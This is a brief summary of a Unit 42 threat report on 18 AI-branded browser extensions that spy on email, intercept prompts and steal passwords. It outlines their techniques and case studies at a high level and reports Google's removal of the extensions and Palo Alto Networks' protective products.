UNIT 42’s analysis identifies 18 AI browser extensions marketed as productivity tools that are not as they seem, including ones that surveil emails, intercept prompts and exfiltrate passwords. The report shows these high‑risk extensions can deliver remote access Trojans, man‑in‑the‑middle attacks and infostealers, leveraging gradients of GenAI lures with techniques such as API interception, passive DOM observation, traffic proxying and HTTPS decryption.
Table 1 summarises recurring techniques seen across the extensions, including WebSocket-based C2 channels and browser API hooking, DOM exfiltration, dynamic proxy configuration, cross-storage persistence and misused onInstalled events. Case studies describe six malware categories, from a RAT extension that maintains a persistent WebSocket connection to a Supersonic AI extension that reads email content in plaintext, via content scripts, and a Chat AI for Chrome hijacking users’ search settings.
Unit 42 notes that Google removed or warned owners of 18 extensions, and it urges users to source extensions only from trusted providers and apply least-privilege principles. Palo Alto Networks says customers are protected through a suite of products including Prisma Browser and Prisma AIRS, and it provides contact details for the Unit 42 Incident Response team, with 30 April 2026 cited as the publication date.